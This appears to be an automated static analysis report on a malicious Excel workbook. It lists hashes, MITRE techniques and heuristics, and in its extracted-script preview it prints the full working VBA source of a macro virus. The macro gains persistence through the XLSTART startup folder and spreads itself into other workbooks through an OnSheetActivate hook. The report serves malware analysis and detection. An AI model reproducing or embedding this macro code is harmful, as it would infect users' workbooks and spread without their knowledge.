Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2590bd6caa7f5b18…

MALICIOUS

Office (OLE)

37.5 KB Created: 2014-04-14 09:00:00 Authoring application: Microsoft Excel First seen: 2014-07-15
MD5: 1206f05b8b24c98b948b5a0a1fac0226 SHA-1: f247cafc03464aae0590c2b7ea4950a18cad286b SHA-256: 2590bd6caa7f5b18a99992ed206184e97220071e8758be52292fca8fbadf3611
108 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The VBA macro code explicitly copies the current workbook to the Excel startup folder as '1006(潘).xls', establishing persistence. It also sets up an 'OnSheetActivate' hook to infect other workbooks, indicating a spreading mechanism. The presence of Auto_Open and the workbook infection heuristics strongly suggest a macro-based malware designed for persistence and propagation.

Heuristics 4

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
      If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "1006(潘).xls") = "" Then
  • VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADER
    The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
    Matched line in script
      Application.OnSheetActivate = "1006(潘).xls!acop"
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1162 bytes
SHA-256: 67338e26aeb9703c06ee99142c5e7afce84d11d3efccbe09a8a42efdf3fbc396
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "StartUp"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "1006(潘).xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "1006(潘).xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("1006(潘).xls").Save
    Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "1006(潘).xls!acop"

End Sub

Sub acop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("1006(潘).xls").Sheets("StartUp").Copy before:=Worksheets(1)
    Sheets(n$).Select
  End If
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.